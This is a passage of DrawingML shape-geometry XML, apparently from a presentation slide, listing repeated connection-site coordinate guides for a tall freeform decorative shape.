              <a:gd name="connsiteY28" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 460893 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 434521 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 3945686 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 505401 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 463335 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 448810 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY116" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY117" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 182911 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 263062 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 266061 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6272987 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 460893 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 434521 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 3945686 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 505401 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 463335 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 448810 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY116" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY117" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
